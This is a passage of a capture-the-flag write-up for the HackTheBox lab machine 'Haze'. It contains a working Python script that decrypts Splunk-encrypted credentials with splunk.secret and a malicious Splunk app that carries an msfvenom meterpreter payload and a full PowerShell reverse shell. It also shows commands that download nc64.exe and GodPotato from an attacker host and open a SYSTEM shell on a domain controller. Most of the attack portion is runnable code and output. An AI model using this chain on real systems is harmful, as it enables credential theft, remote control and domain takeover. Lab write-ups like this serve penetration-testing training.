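Both decrypt steps in this writeup (the `$7$` value pulled through the LFI and the `$1$` value found in the backup) come down to two small schemes keyed from splunk.secret. The script below is an added example, not splunksecrets itself, that implements both and scans a .conf text for every encrypted value the way the grep above does. `$1$` is RC4 keyed with the first 16 bytes of the secret, followed by an XOR with the fixed string DEFAULTSA and a trailing NUL; `$7$` is PBKDF2-HMAC-SHA256 (salt `disk-encryption`, one iteration) over the 254-byte secret into an AES-256-GCM key, with the 16-byte IV in front of the ciphertext and the tag behind it. The secret and the authentication.conf used in the demo are constructed here, not the ones from Haze; the `$7$` functions need the third-party `cryptography` package, the rest is stdlib only.

```python
"""Decrypt Splunk-encrypted .conf values ($1$ legacy RC4 and $7$ AES-256-GCM) with splunk.secret."""
import base64
import hashlib
import itertools
import os
import re

LEGACY_MASK = b"DEFAULTSA"        # static XOR mask Splunk applies before RC4 in the $1$ scheme
V7_KDF_SALT = b"disk-encryption"  # PBKDF2-HMAC-SHA256 salt (1 iteration, 32-byte key) in the $7$ scheme
ENC_VALUE = re.compile(r"^\s*(\w+)\s*=\s*(\$[17]\$[A-Za-z0-9+/=]+)\s*$", re.M)


def _rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (stdlib only), so the legacy scheme needs no third-party crypto."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _mask(data: bytes) -> bytes:
    """XOR with the cycled mask; a byte equal to its mask byte is kept, so no byte becomes NUL."""
    return bytes(b if b == m else b ^ m for b, m in zip(data, itertools.cycle(LEGACY_MASK)))


def decrypt_legacy(secret: bytes, value: str) -> str:
    """$1$: RC4 keyed with secret[:16], then unmask; the final byte is a NUL terminator."""
    plain = _rc4(secret[:16], base64.b64decode(value[3:]))
    return _mask(plain[:-1]).decode("latin-1")


def encrypt_legacy(secret: bytes, plaintext: str) -> str:
    masked = _mask(plaintext.encode("latin-1")) + b"\x00"
    return "$1$" + base64.b64encode(_rc4(secret[:16], masked)).decode()


def _v7_key(secret: bytes) -> bytes:
    if len(secret) < 254:
        raise ValueError("splunk.secret must be at least 254 bytes for $7$ values")
    return hashlib.pbkdf2_hmac("sha256", secret[:254], V7_KDF_SALT, 1, dklen=32)


def decrypt_v7(secret: bytes, value: str) -> str:
    """$7$: base64( IV[16] || AES-256-GCM ciphertext || tag[16] ); needs the `cryptography` package."""
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    raw = base64.b64decode(value[3:])
    return AESGCM(_v7_key(secret)).decrypt(raw[:16], raw[16:], None).decode()


def encrypt_v7(secret: bytes, plaintext: str) -> str:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    iv = os.urandom(16)
    return "$7$" + base64.b64encode(iv + AESGCM(_v7_key(secret)).encrypt(iv, plaintext.encode(), None)).decode()


def decrypt_value(secret: bytes, value: str) -> str:
    if value.startswith("$1$"):
        return decrypt_legacy(secret, value)
    if value.startswith("$7$"):
        return decrypt_v7(secret, value)
    raise ValueError("not a Splunk-encrypted value")


def decrypt_conf(secret: bytes, conf_text: str) -> dict:
    """Every `key = $1$...` / `key = $7$...` line of a .conf, decrypted (what the grep above finds)."""
    return {key: decrypt_value(secret, enc) for key, enc in ENC_VALUE.findall(conf_text)}


# Constructed demo data. A real splunk.secret is 254 random characters; read the file with .strip()
# (it carries a trailing newline). This one is padded to that length from a fixed string.
DEMO_SECRET = (b"demo-splunk-secret-" * 14)[:254]
DEMO_CONF = (
    "[Haze LDAP Auth]\n"
    "bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb\n"
    "bindDNpassword = " + encrypt_legacy(DEMO_SECRET, "Sp1unkadmin@2k24") + "\n"
    "[splunk_auth]\n"
    "minPasswordLength = 8\n"
)

if __name__ == "__main__":
    print(decrypt_conf(DEMO_SECRET, DEMO_CONF))
```

Point `decrypt_conf` at the .conf files from the backup together with the secret from that same backup (etc/auth/splunk.secret). A value encrypted under a different instance's secret fails the GCM tag check for `$7$`, but `$1$` has no integrity check and simply decrypts to garbage, which is a useful reminder of why the legacy scheme was replaced.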
splunk rev shell

The admin password logs into Splunk Web on port 8000, and a Splunk admin can install apps. A custom app whose default/inputs.conf registers bin/run.bat as a scripted input gets executed by splunkd, i.e. as the account the Splunk service runs under (https://github.com/0xjpuff/reverse_shell_splunk is the template used here). Either payload below works; the one actually used is the plain PowerShell reverse shell shown after the tree.

run.ps1

```sh
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.4 LPORT=443 -f psh-reflection -o run.ps1
```

run.bat

```bat
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File run.ps1
```
```sh
┌──(root㉿kali)-[/home/…/htb-labs/Haze/reverse_shell_splunk/reverse_shell_splunk]
└─# tree
.
├── bin
│   ├── run.bat
│   └── run.ps1
└── default
    └── inputs.conf
3 directories, 3 files
```

run.ps1
The run.ps1 actually placed in bin/ is the plain TCP reverse shell below (it dials the listener on 445), not the msfvenom payload:

```powershell
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
```sh
tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
```

Start the listener, then install the .spl as an app through Splunk Web (Apps > Manage Apps > Install app from file) as admin. splunkd runs the scripted input and the shell comes back as the Splunk service account:

```sh
rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.61] 55439
whoami
haze\alexander.green
```

whoami
```sh
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```

SeImpersonatePrivilege
The Splunk service runs as a domain user with SeImpersonatePrivilege, the classic setup for a potato attack. systeminfo confirms the target: Windows Server 2022 build 20348, the primary domain controller, no hotfixes listed, so GodPotato is the straightforward route to SYSTEM.

```sh
PS C:\> systeminfo
Host Name: DC01
OS Name: Microsoft Windows Server 2022 Standard
OS Version: 10.0.20348 N/A Build 20348
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00454-20165-01481-AA286
Original Install Date: 3/4/2025, 11:00:20 PM
System Boot Time: 4/8/2025, 11:48:02 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.24224532.B64.2408191458, 8/19/2024
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,423 MB
Virtual Memory: Max Size: 5,503 MB
Virtual Memory: Available: 3,593 MB
Virtual Memory: In Use: 1,910 MB
Page File Location(s): C:\pagefile.sys
Domain: haze.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.61
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```
Serve nc64.exe and GodPotato from the attacker box, fetch them in the shell, and catch the SYSTEM shell with another nc listener (the GodPotato command dials 10.10.14.4:445 again):

```sh
Invoke-WebRequest http://10.10.14.4/nc64.exe -OutFile nc64.exe
Invoke-WebRequest http://10.10.14.4/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe
.\GodPotato-NET4.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.4 445"
```

Since this is the domain controller, SYSTEM here is Domain Admin in practice:

```sh
C:\Users\Administrator\Desktop>type root.txt
841980b2...
```